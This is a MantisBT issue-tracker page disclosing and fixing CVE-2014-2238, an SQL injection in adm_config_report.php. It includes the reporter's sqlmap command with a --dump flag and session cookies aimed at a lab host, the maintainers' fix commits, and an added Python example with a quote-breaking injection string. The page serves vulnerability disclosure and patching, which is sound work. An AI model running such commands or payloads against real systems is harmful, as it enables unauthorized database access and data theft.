View Issue Details
ID | Project | Category | View Status | Date Submitted | Last Update |
---|---|---|---|---|---|
0017055 | mantisbt | security | public | 2014-02-28 11:00 | 2014-03-03 14:24 |
Reporter | HauntIT | Assigned To | dregad | ||
Priority | immediate | Severity | major | Reproducibility | always |
Status | closed | Resolution | fixed | ||
Product Version | 1.2.13 | ||||
Target Version | 1.2.17 | Fixed in Version | 1.2.17 | ||
Summary | 0017055: CVE-2014-2238: SQL injection vulnerability in adm_config_report.php | ||||
Description | Jakub Galczyk from HauntIT discovered an SQL injection vulnerability in the manage configuration page. | ||||
Additional Information | k@lab:~/src/sqlmap$ ./sqlmap.py -u "http://10.149.14.62//k/cms/mantis/mantisbt-1.2.16/adm_config_report.php" --data "save=1&filter_user_id=0&filter_project_id=0&filter_config_id=-2&apply_filter_button=Apply+Filter" -cookie "groupoffice=l8iqg3amg3klb0rn39u2ms19q3; p7token=2aec66601c948d5bf84eae77cc743529; itop-6e03ab144a03733e272e7756ba585991=ual3fb0vsqm9847uodsvs79472; PHPSESSID=3srq832a7cfmn6dku1ttr70tq1; utma=65758510.2100553510.1393586134.1393586134.1393586134.1; utmc=65758510;__utmz=65758510.1393586134.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MANTIS_secure_session=1; MANTIS_STRING_COOKIE=f53b003d0014eeea9028334751d8c28bf8f23e56fe7bc77e46bbe7c857a280f4; MANTIS_PROJECT_COOKIE=1; MANTIS_MANAGE_CONFIG_COOKIE=0%3A0%3A-2; MANTIS_VIEW_ALL_COOKIE=1; MANTIS_BUG_LIST_COOKIE=1;" --dbms=mysql --dump
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:19:12
[15:19:12] [INFO] testing connection to the target URL
[15:23:13] [WARNING] POST parameter 'apply_filter_button' is not injectable
| ||||
Tags | No tags attached. | ||||
I can confirm the vulnerability, which is due to inlining query parameters instead of using db_param(). Bug was introduced in 1.2.13, by commit f8a81a33880752364ea47bdd9a987bff986c81de |
|
sqlmap test after patching:
|
|
CVE request http://thread.gmane.org/gmane.comp.security.oss.general/12241 |
|
MantisBT: master-1.2.x a608f2d0 2014-02-28 07:23 |
Fix SQL injection vulnerability in adm_config_report.php
Jakub Galczyk (HauntIT blog http://hauntit.blogspot.com/) reported this issue, introduced by f8a81a33880752364ea47bdd9a987bff986c81de in MantisBT 1.2.13. Root cause is the use of unsanitized inlined query parameters.
Fixes 0017055 |
Affected Issues 0017055 |
|
mod - adm_config_report.php |
MantisBT: master e8bdd248 2014-02-28 07:23 |
Fix SQL injection vulnerability in adm_config_report.php
Jakub Galczyk (HauntIT blog http://hauntit.blogspot.com/) reported this issue, introduced by f8a81a33880752364ea47bdd9a987bff986c81de in MantisBT 1.2.13. Root cause is the use of unsanitized inlined query parameters.
Fixes 0017055 |
Affected Issues 0017055 |
|
mod - adm_config_report.php |
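
The root cause named in the note and in both commit messages above (filter values inlined into the query text instead of being bound, as db_param() is meant to do) is illustrated here with an added example that is not MantisBT's code. Python's sqlite3 stands in for the PHP database layer; the table layout, the `NO_FILTER` sentinel, the function names and all sample rows and values are constructed assumptions.

```python
import sqlite3

NO_FILTER = "-2"  # assumed sentinel meaning "do not filter on this field"
COLUMNS = ("user_id", "project_id", "config_id")  # fixed list, never from the request

def make_db():
    """In-memory table with constructed rows standing in for the config table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE config (config_id TEXT, project_id INTEGER,"
               " user_id INTEGER, value TEXT)")
    db.executemany("INSERT INTO config VALUES (?, ?, ?, ?)", [
        ("window_title", 0, 0, "Tracker"),
        ("default_language", 1, 0, "english"),
        ("bug_report_page_fields", 1, 7, "constructed-value"),
    ])
    return db

def report_inlined(db, filters):
    """'Before' pattern: request values are pasted into the SQL text."""
    where = "1=1"
    for column in COLUMNS:
        if filters[column] != NO_FILTER:
            where += f" AND {column}='{filters[column]}'"
    sql = f"SELECT config_id FROM config WHERE {where} ORDER BY config_id"
    return [row[0] for row in db.execute(sql)]

def report_bound(db, filters):
    """'After' pattern: the SQL text holds only placeholders; values travel separately."""
    where, params = ["1=1"], []
    for column in COLUMNS:
        if filters[column] != NO_FILTER:
            where.append(f"{column} = ?")
            params.append(filters[column])
    sql = ("SELECT config_id FROM config WHERE " + " AND ".join(where)
           + " ORDER BY config_id")
    return [row[0] for row in db.execute(sql, params)]

def demo():
    db = make_db()
    benign = {"user_id": "0", "project_id": "1", "config_id": NO_FILTER}
    # Constructed tainted value: the quote ends the string literal early.
    tainted = dict(benign, config_id="x' OR '1'='1")
    return {"benign_inlined": report_inlined(db, benign),
            "benign_bound": report_bound(db, benign),
            "tainted_inlined": report_inlined(db, tainted),
            "tainted_bound": report_bound(db, tainted)}

if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```

Both functions return the same rows for well-formed filter values; only the inlined one lets a filter value change the shape of the WHERE clause, which is the difference a regression test for this fix should pin down.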